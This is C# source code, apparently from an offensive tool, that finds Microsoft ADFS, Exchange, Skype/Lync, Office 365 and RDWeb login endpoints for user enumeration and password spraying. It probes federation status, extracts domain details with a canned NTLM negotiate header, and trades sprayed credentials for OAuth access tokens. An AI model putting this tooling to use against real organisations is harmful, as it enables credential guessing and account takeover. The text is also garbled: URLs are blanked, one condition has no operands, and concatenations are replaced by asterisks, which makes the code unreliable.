public static Boolean PreEmptOAuthPostExploit(CredentialsRecord record, List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames) { if (record.Token != "" && record.Token != null) { return(true); } else { ServiceInterface serviceInterface = getOrCreateServiceInterface(serviceInterfaces, UI, enumeratedHostnames); if (serviceInterface != null) { //So basically - we need to auth to the REAL SKYPE interface AUTH ENDPOINT - IF it is oauth - and get the token - add it to this record and change the record's service to Skype //THIS IS THEN ONE ALREADY SET UP - REAL LYNC ETC - SO JUST GO - WITH NEW USERNAME LIST //Check it is not an NTLM endpoint or such for Skype if ( != "" && != null) { if ("oauthtoken")) { //This CAN BE either legacy or modern format - so just go with what we have as known valid //Only causes issue with legacy here if user is invalid = v slow string domainUser = record.Username; UI.ThreadSafeAppendLog("[4]Record username in required format: " + domainUser); string postData = "grant_type=password&username="******"&password="******"application/x-www-form-urlencoded"; request.UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"; request.Method = "POST"; var data = Encoding.ASCII.GetBytes(postData); request.ContentLength = data.Length; try { using (var stream = request.GetRequestStream()) { stream.Write(data, 0, data.Length); } var response = (HttpWebResponse)request.GetResponse(); var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd(); response.Close(); UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString); if (responseString.Contains("access_token")) { //Add access token to existing record Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString); if (accessTokenMatch.Success) { string accessToken = accessTokenMatch.Value; record.Token = accessToken; record.Service = MicrosoftService.Skype; UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token."); return(false); } } } catch (WebException webException3) { HttpWebResponse response = webException3.Response as HttpWebResponse; try { var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd(); UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString); if (responseString.Contains("access_token")) { Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString); if (accessTokenMatch.Success) { string accessToken = accessTokenMatch.Value; record.Token = accessToken; record.Service = MicrosoftService.Skype; UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token."); return(false); } } else if (responseString.Contains("Bad Request")) { UI.ThreadSafeAppendLog("[1]Valid credentials found - User not SIP enabled or similar: " + record.Username); return(false); } } catch (Exception esdf) { UI.ThreadSafeAppendLog("[1]Exception: " + esdf.ToString()); return(false); } } catch (Exception ex) { UI.ThreadSafeAppendLog("[1]Exception: " + ex.ToString()); return(false); } } else { UI.ThreadSafeAppendLog("[1]Oauth URL not found for Skype host - perhaps the password spray URL is NTLM authentication or other..."); return(false); } } else { UI.ThreadSafeAppendLog("[1]No valid authentication URL..."); return(false); } } else { UI.ThreadSafeAppendLog("[1]No valid Skype host for authenticaton..."); return(false); } } return(false); }
public bool CheckFederated() { UI.ThreadSafeAppendLog("[2]Checking organisation federated status..."); WebRequests checkFederated = CreateWebRequestFederated("" + targetDomain + "&api-version=2.1&checkForMicrosoftAccount=true"); HttpWebResponse federatedWebResponse = checkFederated.MakeGETRequest(); string responseFederated = WebRequests.GetResponseString(federatedWebResponse); JObject federatedResponse = JObject.Parse(responseFederated); string isFederated = (string)federatedResponse.SelectToken("NameSpaceType"); string brandName = (string)federatedResponse.SelectToken("FederationBrandName"); UI.ThreadSafeAppendLog("[2][*]Organisation brand name: " + brandName); if (federatedResponse != null) { JToken interim = federatedResponse.SelectToken("TenantBrandingInfo[0]"); if (interim != null) { var signInDisabled = interim.SelectToken("KeepMeSignedInDisabled"); //bool signInDisabled = (bool)federatedResponse.SelectToken("TenantBrandingInfo[0].KeepMeSignedInDisabled"); UI.ThreadSafeAppendLog("[2][*]Organisation - cloud setting KeepMeSignedInDisabled: " + signInDisabled); } } if (isFederated == "Federated") { UI.ThreadSafeAppendLog("[2][*]Organisation is federated - password spraying needs to hit ADFS not O365 login..."); string ADFSUrl = (string)federatedResponse.SelectToken("AuthURL"); //Need to check and add ADFS record here //Strip out server name string ADFSUrlStripped = ""; Match match = RegexClass.ReturnMatch(Regexs.ADFSAuthURL, ADFSUrl); if (match.Success) { ADFSUrlStripped = match.Value; } if (ADFSUrlStripped != "") { UI.ThreadSafeAppendLog("[2]Validating ADFS Auth URL: https://" + ADFSUrlStripped + "/adfs/ls/idpinitiatedsignon"); WebRequests ADFSValidationRequest = CreateWebRequest("https://" + ADFSUrlStripped + "/adfs/ls/idpinitiatedsignon"); HttpWebResponse ADFSValidationRequestResponse = ADFSValidationRequest.MakeGETRequest(); string responseADFSValidation = WebRequests.GetResponseString(ADFSValidationRequestResponse); WebHeaderCollection headersADFSValidation = WebRequests.GetResponseHeaders(ADFSValidationRequestResponse); if (headersADFSValidation != null) { if (headersADFSValidation.ToString().Contains("No authentication method configured for the URL in the request")) { UI.ThreadSafeAppendLog("[2]Server appears to have authentication disabled for: " + ADFSValidationRequest.url); } else if (responseADFSValidation.Contains("/adfs/")) { IPAddress[] ipaddrADFS; IPHostEntry ipEntry; ipEntry = Dns.GetHostEntry(ADFSUrlStripped); ipaddrADFS = ipEntry.AddressList; Hostnames validADFS = new Hostnames() { O365 = "N", Hostname = ADFSUrlStripped, EnumURL = new URLObject() { Url = "https://" + ADFSUrlStripped + "/adfs/ls/idpinitiatedsignon", Type = URLType.UserEnum }, SprayURL = new URLObject() { Url = "https://" + ADFSUrlStripped + "/adfs/ls/idpinitiatedsignon", Type = URLType.Oauth }, Service = MicrosoftService.ADFS, ipAddress = ipaddrADFS.First() }; //NOT GOT ANYTHING FOR O365 DISCOVERY HERE CollectionUpdates.AddHostnameRecord(validADFS, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, validADFS.Service, true, true); } } } else { UI.ThreadSafeAppendLog("[2]Unable to match ADFS URL..."); } return(true); } else { UI.ThreadSafeAppendLog("[2][*]Organisation is not federated - password spraying can hit O365 login, and will provide details of MFA..."); return(false); } //Need to properly JSON parse here - get NameSpaceType (if !null - if Federated //Also output - KeepMeSignedInDisabled and FederationBrandName //Basically - output - Federated/Managed/Whatever to UI - but is either true or false - Federated //Also output SignInDisabled and FederationBrandName - but don't need to add to any records anywhere //Also - pull AuthURL and add that record if Federated only }
private void MakeNTLMRequests(Hostnames host, bool isADFS) { if (host.NTLMDomain == "" && host.OAuthDomain == "") { if (host.SprayURL.Url != "") { if (host.SprayURL.Type == URLType.NTLM) { //So we already have NTLM spray URL - do it there as that's what we'll be hitting //Make NTLM Auth Request WebRequests NTLMWebRequest = CreateWebRequest(host.SprayURL.Url); UI.ThreadSafeAppendLog("[3]Testing for NTLM authentication at URL: " + NTLMWebRequest.request.RequestUri + "..."); if (isADFS) { NTLMWebRequest.request.Headers.Add("Authorization", "Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="); } else { NTLMWebRequest.request.Headers.Add("Authorization", "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="); } HttpWebResponse NTLMResponse = NTLMWebRequest.MakeGETRequest(); WebHeaderCollection headers = WebRequests.GetResponseHeaders(NTLMResponse); if (headers != null) { string ntlmResponse = headers.ToString(); //FOR DOMAIN INFORMATION - don't want to check has NTLM or Negotiate as we still just want to get the response even if we can't spray UI.ThreadSafeAppendLog("[3]NTLM Response: " + ntlmResponse); if (isADFS) { Match NTLMString = RegexClass.ReturnMatch(Regexs.NTLMResponseADFS, ntlmResponse); if (NTLMString.Success) { ParseNTLM(NTLMString.Value, host, host.SprayURL.Url); } else { Match NTLMString2 = RegexClass.ReturnMatch(Regexs.NTLMResponse, ntlmResponse); if (NTLMString2.Success) { ParseNTLM(NTLMString2.Value, host, host.SprayURL.Url); } } } else { Match NTLMString = RegexClass.ReturnMatch(Regexs.NTLMResponse, ntlmResponse); if (NTLMString.Success) { ParseNTLM(NTLMString.Value, host, host.SprayURL.Url); } } } else { UI.ThreadSafeAppendLog("[2]Null Resposne"); } } } //Do yet ANOTHER test - have we cracked it above - if not - cycle through list of possibles... if (host.NTLMDomain == "" && host.OAuthDomain == "") { foreach (string url in URLs) { //Do the check again in case the last one has now filled these in if (host.NTLMDomain == "" && host.OAuthDomain == "") { //Make NTLM Auth Request WebRequests NTLMWebRequest = CreateWebRequest(url); UI.ThreadSafeAppendLog("[3]Testing for NTLM authentication at URL: " + NTLMWebRequest.request.RequestUri + "..."); if (isADFS) { NTLMWebRequest.request.Headers.Add("Authorization", "Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="); } else { NTLMWebRequest.request.Headers.Add("Authorization", "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="); } HttpWebResponse NTLMResponse = NTLMWebRequest.MakeGETRequest(); WebHeaderCollection headers = WebRequests.GetResponseHeaders(NTLMResponse); if (headers != null) { string ntlmResponse = headers.ToString(); //FOR DOMAIN INFORMATION - don't want to check has NTLM or Negotiate as we still just want to get the response even if we can't spray UI.ThreadSafeAppendLog("[3]NTLM Response: " + ntlmResponse); if (isADFS) { Match NTLMString = RegexClass.ReturnMatch(Regexs.NTLMResponseADFS, ntlmResponse); if (NTLMString.Success) { ParseNTLM(NTLMString.Value, host, url); } else { Match NTLMString2 = RegexClass.ReturnMatch(Regexs.NTLMResponse, ntlmResponse); if (NTLMString2.Success) { ParseNTLM(NTLMString2.Value, host, host.SprayURL.Url); } } } else { Match NTLMString = RegexClass.ReturnMatch(Regexs.NTLMResponse, ntlmResponse); if (NTLMString.Success) { ParseNTLM(NTLMString.Value, host, url); } } } else { UI.ThreadSafeAppendLog("[2]Null Resposne"); } } else { UI.ThreadSafeAppendLog("[4]Break"); break; } } } } }
public void Validate() { foreach (Hostnames host in toValidate) { bool breaker = false; switch (host.Service) { case MicrosoftService.ADFS: //ENUM/SPRAY URLS ARE THE SAME - SO ONCE VALIDATED - ADD TO EACH WebRequests ADFSRequest = CreateWebRequest("https://" + host.Hostname + "/adfs/ls/idpinitiatedsignon"); HttpWebResponse adfsResponse = ADFSRequest.MakeGETRequest(); string responseADFS = WebRequests.GetResponseString(adfsResponse); WebHeaderCollection headersADFS = WebRequests.GetResponseHeaders(adfsResponse); if (areYouNginxOrNull(headersADFS)) { breaker = true; break; } if (headersADFS != null) { if (headersADFS.ToString().Contains("No authentication method configured for the URL in the request")) { UI.ThreadSafeAppendLog("[2]Server appears to have authentication disabled for: " + ADFSRequest.url); } else if (responseADFS.Contains("/adfs/")) { //NOT GOT ANYTHING FOR O365 DISCOVERY HERE host.O365 = "N"; host.EnumURL = new URLObject() { Url = "https://" + host.Hostname + "/adfs/ls/idpinitiatedsignon", Type = URLType.UserEnum }; host.SprayURL = new URLObject() { Url = "https://" + host.Hostname + "/adfs/ls/idpinitiatedsignon", Type = URLType.Oauth }; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, true); } } break; case MicrosoftService.Exchange: //Validate USER ENUM WebRequests exchangeRequest = CreateWebRequest("https://" + host.Hostname + "/owa/auth.owa"); HttpWebResponse exchangeResponse = exchangeRequest.MakeGETRequest(); string responseExchange = WebRequests.GetResponseString(exchangeResponse); WebHeaderCollection headersExchange = WebRequests.GetResponseHeaders(exchangeResponse); if (areYouNginxOrNull(headersExchange)) { breaker = true; break; } if (headersExchange != null) { if (headersExchange.ToString().Contains("No authentication method configured for the URL in the request")) { UI.ThreadSafeAppendLog("[2]Server appears to have authentication disabled for: " + exchangeRequest.url); } else if (responseExchange.Contains("owa") || responseExchange.Contains("OutlookSession")) { if (responseExchange.Contains("")) { //Check federated status and handle if (CheckFederated()) { host.Federated = "Y"; } else { host.Federated = "N"; } //Can refactor this... //DEAL WITH O365 HERE host.O365 = "Y"; //Change service to O365(?) host.Service = MicrosoftService.Office365; host.OAuthDomain = UI.targetDomain; host.EnumURL = new URLObject() { Url = "", Type = URLType.UserEnum }; if (host.Federated == "Y") { //host.OAuthURL = ""; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, false); } else { host.SprayURL = new URLObject() { Url = "", Type = URLType.Oauth }; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, true); } } else { //HOST should already have subdomain - IP address - can now add O365 N host.O365 = "N"; host.EnumURL = new URLObject() { Url = "https://" + host.Hostname + "/owa/auth.owa", Type = URLType.UserEnum }; } } } //VALIDATE PASS SPRAY SEPERATELY - MAY NOT HAVE ENUM - BUT DOES HAVE PASS SPRAYABLE POINT WebRequests exchangeRequestSpray = CreateWebRequest("https://" + host.Hostname + "/Autodiscover"); HttpWebResponse exchangeResponseSpray = exchangeRequestSpray.MakeGETRequest(); string responseExchangeSpray = WebRequests.GetResponseString(exchangeResponseSpray); WebHeaderCollection headersExchangeSpray = WebRequests.GetResponseHeaders(exchangeResponseSpray); if (areYouNginxOrNull(headersExchangeSpray)) { breaker = true; break; } if (headersExchangeSpray != null) { if (headersExchangeSpray.ToString().Contains("NTLM") || headersExchangeSpray.ToString().Contains("Negotiate")) { if (headersExchangeSpray.GetValues("request-id") != null) { if (host.O365 == "Y") { //We need to create a second host with JUST spray URL and add that too Hostnames host2 = new Hostnames() { SprayURL = new URLObject() { Url = "https://" + host.Hostname + "/Autodiscover", Type = URLType.Oauth }, Service = MicrosoftService.Exchange, O365 = "N", Hostname = host.Hostname, ipAddress = host.ipAddress }; CollectionUpdates.AddHostnameRecord(host2, UI.enumeratedHostnames, UI); //NEED TO MAKE ADD SERVICE INCLUDING WHICH TABS TAKE INTO ACCOUNT IF HOST HAS ENUM/SPRAY ENABLED - ACTUALLY NEED SEPERATE HOST IF //ONE WAS O365 AND ONE WAS ON-PREM AddService.AddServiceToOptions(UI, host2.Service, false, true); } else { //Just add oauth to existing on-prem record which will be added at the end host.SprayURL = new URLObject() { Url = "https://" + host.Hostname + "/Autodiscover", Type = URLType.Oauth }; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); if (host.EnumURL != null) { AddService.AddServiceToOptions(UI, host.Service, true, true); } else { AddService.AddServiceToOptions(UI, host.Service, false, true); } } } else if (host.EnumURL != null) { CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, true); } } else { UI.ThreadSafeAppendLog("[2]Server appears to have authentication disabled for: " + exchangeRequestSpray.url); } } break; case MicrosoftService.Skype: if (UI.enumeratedHostnames.Any(p => p.RealLync == true)) { Hostnames tempHost = UI.enumeratedHostnames.Where(x => x.RealLync == true).First(); if (tempHost.SprayURL != null) { break; } } //So - for any subdomains (will only be ones not already found) - validate WebRequests lyncRequest = CreateWebRequest("https://" + host.Hostname); lyncRequest.request.Accept = "text/xml"; HttpWebResponse lyncResponse = lyncRequest.MakeGETRequest(); string responseLync = WebRequests.GetResponseString(lyncResponse); WebHeaderCollection lyncHeaders = WebRequests.GetResponseHeaders(lyncResponse); if (areYouNginxOrNull(lyncHeaders)) { breaker = true; break; } if (responseLync.Contains("Autodiscover")) { if (responseLync.Contains("")) { //Check federated status and handle if (CheckFederated()) { host.Federated = "Y"; } else { host.Federated = "N"; } //DEAL WITH O365 HERE host.O365 = "Y"; //Change service to O365(?) host.Service = MicrosoftService.Office365; host.OAuthDomain = UI.targetDomain; host.EnumURL = new URLObject() { Url = "", Type = URLType.UserEnum }; if (host.Federated == "Y") { //host.OAuthURL = ""; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); //So for O365 federated - can enum at Office but not spray AddService.AddServiceToOptions(UI, host.Service, true, false); } else { host.SprayURL = new URLObject() { Url = "", Type = URLType.Oauth }; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, true); } } else { //HOST should already have subdomain - IP address - can now add O365 N //Add that subdomain as not real (won't be as only lyncdiscover etc) host.O365 = "N"; host.RealLync = false; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); //So we now have lyncdiscover/internal and have added - so now pull real address and fqdn and add //We also already have the response here //Then - if we don't already have "real"... if (UI.enumeratedHostnames.Any(p => p.RealLync == true)) { } else { //Match the response we've already got here Match match = RegexClass.ReturnMatch(Regexs.SkypeRealAddress, responseLync); if (match.Success) { string realAddress = match.Value; UI.ThreadSafeAppendLog("[1][*] Skype Server Hostname: " + realAddress); //IP Lookup IPHostEntry ipEntry2 = Dns.GetHostEntry(realAddress); IPAddress[] ipAddr2 = ipEntry2.AddressList; foreach (IPAddress addr in ipAddr2) { Hostnames hostReal = new Hostnames() { Hostname = realAddress, ipAddress = addr, Service = MicrosoftService.Skype, O365 = "N", RealLync = true }; //VALIDATE USER ENUM WebRequests lyncRequestReal = CreateWebRequest("https://" + realAddress + "/WebTicket/WebTicketService.svc/Auth"); lyncRequestReal.request.Accept = "text/xml"; HttpWebResponse lyncResponseReal = lyncRequestReal.MakeGETRequest(); WebHeaderCollection Headers = WebRequests.GetResponseHeaders(lyncResponseReal); if (areYouNginxOrNull(Headers)) { breaker = true; break; } if (Headers != null) { if (Headers.ToString().Contains("No authentication method configured for the URL in the request")) { UI.ThreadSafeAppendLog("[2]The server appears to have disabled authentication for the user enumeration URL: " + lyncRequestReal.url); } else if (Headers.GetValues("X-MS-Server-Fqdn") != null) { hostReal.EnumURL = new URLObject() { Url = "https://" + realAddress + "/WebTicket/WebTicketService.svc/Auth", Type = URLType.UserEnum }; } } //Seperately VALIDATE PASS SPRAY //So this isn't the actual pass spray URL - but will tell us the grant types - other option is to check ACTIVE pass spray WITH //Creds - gibberish and see if it says unsupported grant type - would solve if they just blocked /OAuth for some reason //But more active - requires adding and removing during validation active/not active WebRequests lyncRequestSpray = CreateWebRequest("https://" + realAddress + "/WebTicket/WebTicketService.svc/OAuth"); HttpWebResponse lyncRequestSprayResponse = lyncRequestSpray.MakeGETRequest(); WebHeaderCollection HeadersSpray = WebRequests.GetResponseHeaders(lyncRequestSprayResponse); if (areYouNginxOrNull(HeadersSpray)) { breaker = true; break; } if (HeadersSpray != null) { if (HeadersSpray.ToString().Contains("password")) { if (HeadersSpray.GetValues("client-request-id") != null) { UI.ThreadSafeAppendLog("[1][*] " + realAddress + ": " + addr.ToString()); hostReal.SprayURL = new URLObject() { Url = "https://" + realAddress + "/WebTicket/oauthtoken", Type = URLType.Oauth }; CollectionUpdates.AddHostnameRecord(hostReal, UI.enumeratedHostnames, UI); if (hostReal.EnumURL != null) { AddService.AddServiceToOptions(UI, hostReal.Service, true, true); } else { AddService.AddServiceToOptions(UI, hostReal.Service, false, true); } } else if (hostReal.EnumURL != null) { UI.ThreadSafeAppendLog("[1][*] " + realAddress + ": " + addr.ToString()); CollectionUpdates.AddHostnameRecord(hostReal, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, hostReal.Service, true, true); } } else { UI.ThreadSafeAppendLog("[2]It looks like the oauth endpoint has disabled password authentication: " + lyncRequestSpray.url); } } if (hostReal.EnumURL != null) { AddService.AddServiceToOptions(UI, hostReal.Service, true, true); } else if (hostReal.EnumURL == null && hostReal.SprayURL == null) { //Not sure we could hit here with Y - but just to check if (hostReal.O365 != "Y") { UI.ThreadSafeAppendLog("[2]No user enum or pass spray URL discovered for " + host.Hostname + " - attempting to find NTLM endpoints..."); NTLMDiscovery domainInformation = new NTLMDiscovery(); ObservableCollection <Hostnames> mySoloHostname = new ObservableCollection <Hostnames>(); mySoloHostname.Add(hostReal); domainInformation.hostnamesForDomainInformationEnumeration = mySoloHostname; domainInformation.UI = UI; URLObject returnedSprayURL = domainInformation.FindNTLMEndpoints(hostReal); if (returnedSprayURL != null) { hostReal.SprayURL = returnedSprayURL; hostReal.O365 = "N"; CollectionUpdates.AddHostnameRecord(hostReal, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, hostReal.Service, false, true); } } } } } } } } break; case MicrosoftService.Office365: WebRequests O365Request = CreateWebRequest("https://" + host.Hostname + "/autodiscover/autodiscover.json/v1.0/test.test@" + targetDomain + "?Protocol=Autodiscoverv1"); O365Request.request.AllowAutoRedirect = false; HttpWebResponse O365WebResponse = O365Request.MakeGETRequest(); string responseO365 = WebRequests.GetResponseString(O365WebResponse); UI.ThreadSafeAppendLog("[4]O365 Response: " + responseO365); if (responseO365.Contains("")) { //Check federated status and handle if (CheckFederated()) { host.Federated = "Y"; } else { host.Federated = "N"; } host.O365 = "Y"; //Hard code - we manually set up this record - but as this is also needed for lyncdiscover cloud hosted etc... host.EnumURL = new URLObject() { Url = "", Type = URLType.UserEnum }; //FOR NOW - NOT SETTING NTLMDOMAIN - O365 WILL ALWAYS BE HITTING THE @DOMAIN.COM ANYWAY? host.OAuthDomain = UI.targetDomain; if (host.Federated == "Y") { //host.OAuthURL = ""; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, false); } else { host.SprayURL = new URLObject() { Url = "", Type = URLType.Oauth }; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, true); } } break; case MicrosoftService.RDWeb: WebRequests rdWebRequest = CreateWebRequest("https://" + host.Hostname + "/RDWeb/Pages/en-US/login.aspx"); HttpWebResponse rdWebResponse = rdWebRequest.MakeGETRequest(); string responseRDWeb = WebRequests.GetResponseString(rdWebResponse); WebHeaderCollection responseRDHeaders = WebRequests.GetResponseHeaders(rdWebResponse); if (areYouNginxOrNull(responseRDHeaders)) { breaker = true; break; } if (responseRDHeaders != null) { if (responseRDHeaders.ToString().Contains("No authentication method configured for the URL in the request")) { UI.ThreadSafeAppendLog("[2]The server appears to have disabled authentication for the URL: " + rdWebRequest.url); } else { if (responseRDWeb.Contains("RD Web Access")) { //NOT GOT ANYTHING FOR RDWEB O365 host.O365 = "N"; host.EnumURL = new URLObject() { Url = "https://" + host.Hostname + "/RDWeb/Pages/en-US/login.aspx", Type = URLType.UserEnum }; host.SprayURL = new URLObject() { Url = "https://" + host.Hostname + "/RDWeb/Pages/en-US/login.aspx", Type = URLType.Oauth }; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, true, true); } } } break; } if (breaker) { } else { //At the end of doing that host - if we don't have either - ONLY IF NOT EITHER - do NTLM Hostnames tempHost2 = null; if (UI.enumeratedHostnames.Any(p => p.RealLync == true)) { tempHost2 = UI.enumeratedHostnames.Where(x => x.RealLync == true).First(); } if (tempHost2 != null) { if (tempHost2.SprayURL != null) { } else { if (host.EnumURL.Url == "" && host.SprayURL.Url == "") { //Not sure we could hit here with Y - but just to check if (host.O365 != "Y") { UI.ThreadSafeAppendLog("[2]No user enum or pass spray URL discovered - attempting to find NTLM endpoints..."); NTLMDiscovery domainInformation = new NTLMDiscovery(); ObservableCollection <Hostnames> mySoloHostname = new ObservableCollection <Hostnames>(); mySoloHostname.Add(host); domainInformation.hostnamesForDomainInformationEnumeration = mySoloHostname; domainInformation.UI = UI; URLObject returnedSprayURL = domainInformation.FindNTLMEndpoints(host); if (returnedSprayURL != null) { host.SprayURL = returnedSprayURL; host.O365 = "N"; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, false, true); } } } } } else { if (host.EnumURL.Url == "" && host.SprayURL.Url == "") { //Not sure we could hit here with Y - but just to check if (host.O365 != "Y") { UI.ThreadSafeAppendLog("[2]No user enum or pass spray URL discovered - attempting to find NTLM endpoints..."); NTLMDiscovery domainInformation = new NTLMDiscovery(); ObservableCollection <Hostnames> mySoloHostname = new ObservableCollection <Hostnames>(); mySoloHostname.Add(host); domainInformation.hostnamesForDomainInformationEnumeration = mySoloHostname; domainInformation.UI = UI; URLObject returnedSprayURL = domainInformation.FindNTLMEndpoints(host); if (returnedSprayURL != null) { host.SprayURL = returnedSprayURL; host.O365 = "N"; CollectionUpdates.AddHostnameRecord(host, UI.enumeratedHostnames, UI); AddService.AddServiceToOptions(UI, host.Service, false, true); } } } } } } }